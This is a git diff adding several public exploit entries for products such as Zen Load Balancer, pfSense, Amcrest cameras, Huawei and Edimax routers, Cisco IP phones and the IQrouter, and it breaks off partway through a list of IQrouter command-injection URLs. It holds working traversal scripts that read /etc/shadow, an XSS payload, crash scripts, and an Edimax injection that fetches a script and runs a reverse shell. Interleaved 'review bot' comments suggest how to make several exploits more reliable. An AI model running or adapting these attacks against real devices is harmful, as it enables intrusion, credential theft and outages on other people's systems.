diff --git a/exploits/cgi/webapps/48308.py b/exploits/cgi/webapps/48308.py
new file mode 100755
index 000000000..5ce0b9588
--- /dev/null
+++ b/exploits/cgi/webapps/48308.py
@@ -0,0 +1,31 @@
+# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
+# Date: 2020-04-10
+# Exploit Author: Basim Alabdullah
+# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
+# Version: 3.10.1
+# Tested on: Debian8u2
+#
+# Technical Details:
+# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
+# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
+# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
+#
+# Impact:
+# --------
+# Successful exploitation could allow an attacker to obtain sensitive
+# information.
+
+import requests
+import sys
+
+if len(sys.argv) <2:
+    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
+    sys.exit(-1)
+else:
+    files=sys.argv[2]
+    url=sys.argv[1]
+    with requests.session() as s:
+        urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
+        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
+        txt=response.text
+        print(response.text)
\ No newline at end of file
diff --git a/exploits/cgi/webapps/48373.rb b/exploits/cgi/webapps/48373.rb
new file mode 100755
index 000000000..5e00bbf82
--- /dev/null
+++ b/exploits/cgi/webapps/48373.rb
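Review bot: The argument check `if len(sys.argv) <2:` does not cover the second positional argument, so a run with only the URL passes the check and then dies with an IndexError on `files=sys.argv[2]` in the else branch; it should read `if len(sys.argv) < 3:`. The request also hard-codes `auth=('admin', 'admin')` and sets `verify=False`, so against a target with changed credentials the script prints the login-failure page as if it were the requested file — checking `response.status_code` before printing and taking the credentials from the command line would make that explicit. `txt=response.text` is assigned and never used.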
@@ -0,0 +1,83 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Zen Load Balancer Directory Traversal", + 'Description' => %q{ + This module exploits a authenticated directory traversal +vulnerability in Zen Load + Balancer `v3.10.1`. The flaw exists in 'index.cgi' not +properly handling 'filelog=' + parameter which allows a malicious actor to load arbitrary file path. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Basim Alabdullah', # Vulnerability discovery + 'Dhiraj Mishra' # Metasploit module + ], + 'References' => + [ + ['EDB', '48308'] + ], + 'DisclosureDate' => "Apr 10 2020" + )) + + register_options( + [ + Opt::RPORT(444), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptInt.new('DEPTH', [true, 'The max traversal depth', 16]), + OptString.new('FILEPATH', [false, 'The name of the file to +download', '/etc/passwd']), + OptString.new('TARGETURI', [true, "The base URI path of the +ZenConsole install", '/']), + OptString.new('HttpUsername', [true, 'The username to use for +the HTTP server', 'admin']), + OptString.new('HttpPassword', [false, 'The password to use for +the HTTP server', 'admin']) + ]) + end + + def run_host(ip) + filename = datastore['FILEPATH'] + traversal = "../" * datastore['DEPTH'] + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.cgi'), + 'vars_get'=> + { + 'id' => '2-3', + 'filelog' => "#{traversal}#(unknown)", + 'nlines' => '100', + 'action' => 'See logs' + }, + 'authorization' => +basic_auth(datastore['HttpUsername'],datastore['HttpPassword']) + }, 25) + + unless res && res.code == 200 + print_error('Nothing was downloaded') + return + end + + print_good("#{peer} - 
Downloaded #{res.body.length} bytes") + path = store_loot( + 'zenload.http', + 'text/plain', + ip, + res.body, + filename + ) + print_good("File saved in: #{path}") + end +end \ No newline at end of file diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt new file mode 100644 index 000000000..f485c9955 --- /dev/null +++ b/exploits/freebsd/webapps/48300.txt 
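Review bot: In `run_host` the request value reads `'filelog' => "#{traversal}#(unknown)"` as shown here, which means the `filename` taken from the FILEPATH option never reaches the request; this looks like a rendering artifact of `#{filename}`, but if it is literally in the module the loot is mislabelled and the file read is wrong. The success test `unless res && res.code == 200` is also weak for this CGI, which is likely to answer 200 with the log-viewer page when the file is missing or the credentials are rejected, so it would be safer to additionally require a non-empty `res.body` that does not contain the login form before `store_loot`. The description strings are hard-wrapped mid-sentence (`Zen Load` / `Balancer`, `not` / `properly handling`), and that text ends up verbatim in the module metadata.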
@@ -0,0 +1,39 @@ +# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.pfsense.org +# Version: PfSense 2.4.4-P3 +# Tested on: FreeBSD 11.2-RELEASE-p10 +# CVE : CVE-2020-11457 + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. +# Vulnerable Parameter : descr + + +# POC +# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. +# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is +# the id of the user containing the payload. + + +POST /system_usermanager.php?act=new HTTP/1.1 +Host: TARGET +Connection: close +Content-Length: 410 +Cache-Control: max-age=0 +Origin: https://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Sec-Fetch-Dest: document +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Referer: https://TARGET/system_usermanager.php?act=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d + 
+__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save \ No newline at end of file diff --git a/exploits/hardware/webapps/48304.py b/exploits/hardware/webapps/48304.py new file mode 100755 index 000000000..b73eb9ca5 --- /dev/null +++ b/exploits/hardware/webapps/48304.py 
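Review bot: The request as shown is bound to one browser session: `__csrf_magic=sid%3A...` is a session-specific token and `PHPSESSID` is the admin's cookie, so it cannot be replayed verbatim, and the PoC should say that the attacker needs an authenticated session allowed to create users and must fetch a fresh token from `system_usermanager.php?act=new` first. It would also help to state the trust boundary explicitly: the `descr` payload executes when an administrator opens `system_usermanager_addprivs.php?userid=<id>`, so this is an authenticated stored XSS against other admin users rather than a pre-authentication issue.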
@@ -0,0 +1,153 @@ +# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) +# Date: 2020-04-07 +# Exploit Author: Jacob Baines +# Vendor Homepage: https://amcrest.com/ +# Software Link: https://amcrest.com/firmwaredownloads +# Version: Many different versions due to number of Dahua/Amcrest/etc +# devices affected +# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5 +# 4.000.00AC000.0 +# CVE : CVE-2020-5735 +# Advisory: https://www.tenable.com/security/research/tra-2020-20 +# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash + +import argparse +import hashlib +import socket +import struct +import sys +import md5 +import re + +## DDNS test functionality. Stack overflow via memcpy + +def recv_response(sock): + # minimum size is 32 bytes + header = sock.recv(32) + + # check we received enough data + if len(header) != 32: + print 'Invalid response. Too short' + return (False, '', '') + + # extract the payload length field + length_field = header[4:8] + payload_length = struct.unpack_from('I', length_field) + payload_length = payload_length[0] + + # uhm... lets be restrictive of accepted lengths + if payload_length < 0 or payload_length > 4096: + print 'Invalid response. Bad payload length' + return (False, header, '') + + if (payload_length == 0): + return (True, header, '') + + payload = sock.recv(payload_length) + if len(payload) != payload_length: + print 'Invalid response. 
Bad received length' + return (False, header, payload) + + return (True, header, payload) + +def sofia_hash(msg): + h = "" + m = hashlib.md5() + m.update(msg) + msg_md5 = m.digest() + for i in range(8): + n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e + if n > 9: + if n > 35: + n += 61 + else: + n += 55 + else: + n += 0x30 + h += chr(n) + return h + +top_parser = argparse.ArgumentParser(description='lol') +top_parser.add_argument('-i', '--ip', action="store", dest="ip", +required=True, help="The IPv4 address to connect to") +top_parser.add_argument('-p', '--port', action="store", dest="port", +type=int, help="The port to connect to", default="37777") +top_parser.add_argument('-u', '--username', action="store", +dest="username", help="The user to login as", default="admin") +top_parser.add_argument('--pass', action="store", dest="password", +required=True, help="The password to use") +args = top_parser.parse_args() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print "[+] Attempting connection to " + args.ip + ":" + str(args.port) +sock.connect((args.ip, args.port)) +print "[+] Connected!" + +# send the old style login request. We'll use blank hashes. This should +# trigger a challenge from new versions of the camera +old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash + "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash + "\x05\x02\x00\x01\x00\x00\xa1\xaa") +sock.sendall(old_login) +(success, header, challenge) = recv_response(sock) +if success == False or not challenge: + print 'Failed to receive the challenge' + print challenge + sys.exit(0) + +# extract the realm and random seed +seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n", +challenge) +if seeds == None: + print 'Failed to extract realm and random seed.' 
+ print challenge + sys.exit(0) + +realm = seeds.group(1) +random = seeds.group(2) + +# compute the response +realm_hash = md5.new(args.username + ":" + realm + ":" + +args.password).hexdigest().upper() +random_hash = md5.new(args.username + ":" + random + ":" + +realm_hash).hexdigest().upper() +sofia_result = sofia_hash(args.password) +final_hash = md5.new(args.username + ":" + random + ":" + +sofia_result).hexdigest().upper() + +challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x05\x02\x00\x08\x00\x00\xa1\xaa" + + args.username + "&&" + random_hash + final_hash) +sock.sendall(challenge_resp) + +(success, header, payload) = recv_response(sock) +if success == False or not header: + print 'Failed to receive the session id' + sys.exit(0) + +session_id_bin = header[16:20] +session_id_int = struct.unpack_from('I', session_id_bin) +if session_id_int[0] == 0: + print "Log in failed." + sys.exit(0) + +session_id = session_id_int[0] +print "[+] Session ID: " + str(session_id) + +# firmware version +command = "Protocol: " + ("a" * 0x300) + "\r\n" +command_length = struct.pack("I", len(command)) +firmware = ("\x62\x00\x00\x00" + command_length + + "\x04\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + command) +sock.sendall(firmware) +(success, header, firmware_string) = recv_response(sock) +if success == False and not header: + print "[!] Probably crashed the server." +else: + print "[+] Attack failed." \ No newline at end of file diff --git a/exploits/hardware/webapps/48310.txt b/exploits/hardware/webapps/48310.txt new file mode 100644 index 000000000..61e7d2b48 --- /dev/null +++ b/exploits/hardware/webapps/48310.txt 
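Review bot: `recv_response` reads the header and the payload with one `sock.recv(n)` each, but a TCP recv may legitimately return fewer than n bytes, so the 'Too short' and 'Bad received length' branches can fire on a healthy device, and the final `if success == False and not header:` then reports "Attack failed" for what was only a short read; reading in a loop until the requested length (or EOF) arrives removes that ambiguity. The `payload_length < 0` test is dead because `struct.unpack_from('I', ...)` yields an unsigned value. The script is also Python 2 only (`print` statements, the removed `md5` module), which the header should state.
```python
def recv_exact(sock, wanted):
    # TCP recv() may return a short read; loop until `wanted` bytes or EOF
    buf = ''
    while len(buf) < wanted:
        chunk = sock.recv(wanted - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf

def recv_response(sock):
    header = recv_exact(sock, 32)
    # ... unchanged: header length check and payload_length extraction ...
    payload = recv_exact(sock, payload_length)
    # ... unchanged: payload length check and return ...
```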
@@ -0,0 +1,51 @@ +# Title: Huawei HG630 2 Router - Authentication Bypass +# Date: 2020-04-13 +# Author: Eslam Medhat +# Vendor Homepage: www.huawei.com +# Version: HG630 V2 +# HardwareVersion: VER.B +# CVE: N/A + +#POC: + +The default password of this router is the last 8 characters of the +device's serial number which exist in the back of the device. + +An attacker can leak the serial number via the web app API like the +following: + +************************Request************************ +GET /api/system/deviceinfo HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.1.1/ +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: +SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm + + +************************Response************************ +HTTP/1.1 200 OK +Cache-Control: no-cache, no-store, max-age=0, must-revalidate +X-Download-Options: noopen +X-Frame-Options: SAMEORIGIN +X-XSS-Protection: 1; mode=block +Date: Fri, 01 Jan 2010 09:14:47 GMT +Connection: Keep-Alive +Content-Language: en +Content-Type: application/javascript +Content-Length: 141 + +while(1); /*{"DeviceName":"HG630 +V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/ + + +You can use that serial number to login to the router. + +#Reference: +https://www.youtube.com/watch?v=vOrIL7L_cVc \ No newline at end of file diff --git a/exploits/hardware/webapps/48311.py b/exploits/hardware/webapps/48311.py new file mode 100755 index 000000000..18243acd7 --- /dev/null +++ b/exploits/hardware/webapps/48311.py 
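Review bot: The only request shown carries a `SessionID_R3` cookie, so as written the serial-number leak is not demonstrated without a session; the "Authentication Bypass" claim depends on `/api/system/deviceinfo` answering an unauthenticated GET, and the PoC should show that request with no `Cookie` header and its response, or state that the cookie is the pre-login session the router issues on first visit. The `while(1);` prefix in the response is the usual anti-JSON-hijacking guard and has to be stripped before the JSON is parsed, which is worth a sentence for anyone scripting the serial extraction.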
@@ -0,0 +1,43 @@ +# Exploit Title: TVT NVMS 1000 - Directory Traversal +# Date: 2020-04-13 +# Exploit Author: Mohin Paramasivam (Shad0wQu35t) +# Vendor Homepage: http://en.tvt.net.cn/ +# Version : N/A +# Software Link : http://en.tvt.net.cn/products/188.html +# Original Author : Numan Türle +# CVE : CVE-2019-20085 + +import sys +import requests +import os +import time + +if len(sys.argv) !=4: + print " " + print "Usage : python exploit.py url filename outputname" + print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini" + print " " +else: + + + traversal = "../../../../../../../../../../../../../" + filename = sys.argv[2] + url = sys.argv[1]+traversal+filename + outputname = sys.argv[3] + content = requests.get(url) + + if content.status_code == 200: + + print " " + print "Directory Traversal Succeeded" + time.sleep(3) + print " " + print "Saving Output" + os.system("touch " + outputname) + output_write = open(outputname,"r+") + output_write.write(content.text) + output_write.close() + + else: + + print "Host not vulnerable to Directory Traversal!" \ No newline at end of file diff --git a/exploits/hardware/webapps/48318.txt b/exploits/hardware/webapps/48318.txt new file mode 100644 index 000000000..c9731d595 --- /dev/null +++ b/exploits/hardware/webapps/48318.txt 
@@ -0,0 +1,42 @@ +# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution +# Date: 2020-04-13 +# Exploit Author: Wadeek +# Hardware Version: EW-7438RPn-v3 Mini +# Firmware Version: 1.23 / 1.27 +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip + +== Shodan Dorks == + +(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp" +(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234" + +== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) == + +GET /wizard_reboot.asp +showSSID = ""; +document.write(''+""+''); + +== Command Execution * == + +(Setup Mode) +curl 'http:///goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +(Unsetup Mode with default password) +curl 'http:///goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +== Cross-Site Request Forgery -> Command Execution * == + +
+ + +
+ +* [ delivery.sh ] +-------------------------------------------------------------------------------------- +# (msfvenom) linux/mipsbe/shell/reverse_tcp +cd /tmp/ +busybox wget -O reverse http:///reverse +busybox chmod +x reverse +./reverse & +-------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/hardware/webapps/48342.txt b/exploits/hardware/webapps/48342.txt new file mode 100644 index 000000000..b143e957d --- /dev/null +++ b/exploits/hardware/webapps/48342.txt 
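Review bot: The `curl` commands target `http:///goform/mp` and the staged script fetches `http:///delivery.sh`, i.e. the host placeholders are empty in this listing, and the "Cross-Site Request Forgery -> Command Execution" section has no body here, so a reader cannot tell what the CSRF form was; both should carry explicit `<target>` / `<attacker>` placeholders. The "Unsetup Mode" variant sends `Authorization: Basic YWRtaW46MTIzNA==` (`admin:1234`), so that path is command injection behind the factory-default credentials rather than pre-auth; only the Setup-Mode request runs without credentials as shown, and the write-up should separate the two.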
@@ -0,0 +1,13 @@ +# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC) +# Date: 2020-04-15 +# Exploit Author: Jacob Baines +# Vendor Homepage: https://www.cisco.com +# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html +# Version: Before 11.7(1) +# Tested on: Cisco Wireless IP Phone 8821 +# CVE: CVE-2020-3161 +# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs +# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24 + +curl -v --path-as-is --insecure +https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \ No newline at end of file diff --git a/exploits/hardware/webapps/48358.py b/exploits/hardware/webapps/48358.py new file mode 100755 index 000000000..dc5fb38ab --- /dev/null +++ b/exploits/hardware/webapps/48358.py 
@@ -0,0 +1,339 @@ +# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution +# Date: 2020-04-21 +# Exploit Author: drakylar +# Vendor Homepage: https://evenroute.com/ +# Software Link: https://evenroute.com/iqrouter +# Version: IQrouter firmware up to 3.3.1 +# Tested on: IQrouter firmware 3.3.1 +# CVE : N/A + +#!/usr/bin/env python3 +import argparse +from sys import argv, exit + +try: + import requests +except ImportError: + print("Install requests lib! pip3 install requests") + + +print(""" +####################################################################### +# IQrouter multiple RCE and other vulnerabilities # +# by drakylar (Shaposhnikov Ilya) # +# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 # +# CVE-2020-11967 CVE-2020-11968 # +####################################################################### +""") + + +rce_setup = [ + [ + "/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'", + "RCE /vlanTag (vlan_tag param)" + ], + [ + "/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'", + "RCE /verify_wifi (wifi_conflict param). 
Need hide_wifi_config != true" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2", + "RCE /screen9 (s2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2", + "RCE /screen9 (s1 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'", + "RCE /screen9 (p2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2", + "RCE /screen9 (p1 param)" + ], + [ + "/cgi-bin/luci/er/screen4?save_isp='`{}`", + "RCE /screen4 (save_isp param)" + ], + [ + "/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'", + "RCE /screen2 set_wan_modem_interfaces param)" + ], + [ + "/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'", + "RCE /screen2 find_ip_address_conflict param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_question='`{}`'", + "RCE /screen10 (set_security_question param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1", + "RCE /screen10 (set_security_answer param)"], + [ + "/cgi-bin/luci/er/screen1?zonename='`{}`'", + "RCE /screen1 (zonename param)" + ], + [ + "/cgi-bin/luci/er/register?email=`{}`", + "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)" + ] +] + +rce_any = [ + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1", + "RCE /wifi (s2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7", + "RCE /wifi (s1 param)" + ], + [ + 
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'", + "RCE /wifi (p2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4", + "RCE /wifi (p1 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_5g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_2g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guest_key param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7", + "RCE /wifi (enable_guestwifi param)" + ], + [ + "/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123", + "RCE /screen11.1 (email param)" + ], + [ + "/cgi-bin/luci/er/reboot_link?link='`{}`'", + "RCE /reboot_link (link param)" + ], + [ + 
